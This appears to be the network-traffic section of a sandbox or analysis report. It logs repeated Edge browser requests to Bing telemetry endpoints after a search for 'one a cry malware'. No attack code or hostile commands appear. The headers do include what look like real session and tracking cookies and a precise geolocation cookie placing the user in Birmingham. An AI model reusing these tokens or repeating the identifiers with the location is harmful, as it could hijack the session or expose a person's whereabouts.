user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199029.14912924
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 270
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199029.14912925
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 1038
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199029.14912ee0
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 590
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.14913056
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 265
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.14913057
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:27,%22BC%22:338,%22SE%22:-1,%22TC%22:-1,%22H%22:495,%22BP%22:498,%22CT%22:499,%22IL%22:9},%22ad%22:[-1,-1,1263,601,1263,3732,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:27,%22BC%22:338,%22SE%22:-1,%22TC%22:-1,%22H%22:495,%22BP%22:498,%22CT%22:499,%22IL%22:9},%22ad%22:[-1,-1,1263,601,1263,3732,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.14912ee1
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 369
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
